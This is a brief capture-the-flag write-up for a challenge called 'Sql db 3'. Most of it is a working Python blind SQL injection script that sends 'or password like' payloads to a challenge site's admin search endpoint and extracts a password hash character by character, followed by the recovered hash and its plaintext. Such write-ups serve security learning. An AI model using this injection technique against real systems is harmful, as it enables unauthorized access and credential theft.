search

Sql db 3

Blind sql

import requests

url = 'http://joe-cv.threatsims.com/admin/search'
myobj = {'search': "pp' or password like '%"}
myobj = {}
passwd = "#"
for i in range(64):
    for j in "1234567890abcdef":
        passwd = passwd[:-1] + j
        myobj["search"] = "pp' or password like '" + passwd + "%"
        x = requests.post(url, data = myobj)

        a = x.text
        if "joe" in a:
            print(passwd)
            passwd += "#"
            break

    if j == "f" and passwd[-1] != "#":
          break

It gives 248b57c5cabbc9944d169d10bc4959a042d0bb81ab6cfc9166f40a9d0f0fd614 which is hash of "tigers"

PreviousCovid19 CTFNextWeb 1 (Something Derpy? Idk)

Last updated

Was this helpful?